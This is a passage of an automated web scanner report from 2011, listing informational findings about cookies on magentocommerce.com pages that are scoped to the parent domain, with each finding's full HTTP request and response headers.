The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/wander/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175967; expires=Sat, 11-Aug-2012 15:06:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fmedia%2Finterviews%2Fwander%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 40360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.76. http://www.magentocommerce.com/media/interviews/wearport/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wearport/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/wearport/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175899; expires=Sat, 11-Aug-2012 15:04:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fwearport%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:59 GMT
Content-Length: 38889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.77. http://www.magentocommerce.com/media/interviews/wkf-communications/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wkf-communications/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/wkf-communications/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175909; expires=Sat, 11-Aug-2012 15:05:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fwkf-communications%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:09 GMT
Content-Length: 39057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.78. http://www.magentocommerce.com/media/screencasts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/interviews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170908; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.4.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171069; expires=Sat, 11-Aug-2012 13:44:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:29 GMT
Content-Length: 115374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.79. http://www.magentocommerce.com/media/screencasts/adding-related-products/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/adding-related-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176075; expires=Sat, 11-Aug-2012 15:07:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fadding-related-products%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:55 GMT
Content-Length: 33267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.80. http://www.magentocommerce.com/media/screencasts/community-groups/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/community-groups/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176027; expires=Sat, 11-Aug-2012 15:07:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fcommunity-groups%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:07 GMT
Content-Length: 33275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.81. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view  previous  next

Summary

Severity:   Information
Confidence:   Certain